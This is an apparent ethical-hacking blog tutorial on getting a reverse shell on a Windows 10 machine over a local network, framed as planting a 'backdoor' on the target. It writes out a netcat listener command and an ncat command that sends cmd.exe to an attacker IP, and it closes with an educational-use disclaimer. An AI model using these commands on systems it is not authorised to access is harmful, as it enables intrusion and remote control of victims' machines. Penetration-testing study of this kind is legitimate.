Hello welcome folks, we are writing a new blog about how to attacker can gain a reverse connection to the windows 10 machine. Reverse connection via we are connecting now in a same private network but you can connect into another another connection.
A system's backdoor welcome us every time with open hands whenever we knockback. Thus we will try to generate such a similar backdoor over the target's windows machine, which allow us to get in , at any time when we get back.
Setup Listener
First we setup to a listener over our kali machine
nc -lvp 4444
Now we will check our linux's machine IP via ifconfig wlan0 or ifconfig .
Before executing any command in windows machine first we need to check netcat installed or not. If netcat is not install in windows machine then install it.
you should install the Netcat (Ncat) package that comes with Nmap, which you can download from https://nmap.org/download.html#windows
After downloading simple right click on setup file and run as administrator after that open cmd prompt and run for check its properly install or not ncat -h
now its time to run this command ncat.exe 192.168.12.100 4444 -e cmd.exe
Time to get back to our attacker’s machine. From the below image you can see that we are into the victim’s command shell.
Disclaimer
All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.